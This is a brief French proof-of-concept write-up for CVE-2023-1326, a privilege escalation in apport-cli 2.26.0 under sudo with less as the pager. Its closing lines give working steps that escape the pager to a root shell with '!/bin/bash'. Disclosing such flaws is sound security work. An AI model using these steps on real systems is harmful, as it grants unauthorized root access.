
Preuve de concept d'exploitation pour CVE-2023-1326, une vulnérabilité d'élévation de privilèges dans apport-cli 2.26.0 lorsqu'il est configuré avec sudo et less comme paginateur.
Une preuve de concept pour CVE-2023–1326 dans apport-cli 2.26.0
Cette vulnérabilité est une élévation de privilèges dans apport-cli 2.26.0, similaire à CVE-2023–26604, cette vulnérabilité ne fonctionne que si elle est assignée dans sudoers :

Une attaque d'élévation de privilèges a été découverte dans apport-cli 2.26.0 et versions antérieures, similaire à CVE-2023-26604. Si un système est spécialement configuré pour permettre aux utilisateurs non privilégiés d'exécuter sudo apport-cli, que less est configuré comme paginateur et que la taille du terminal peut être définie : un attaquant local peut élever ses privilèges.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
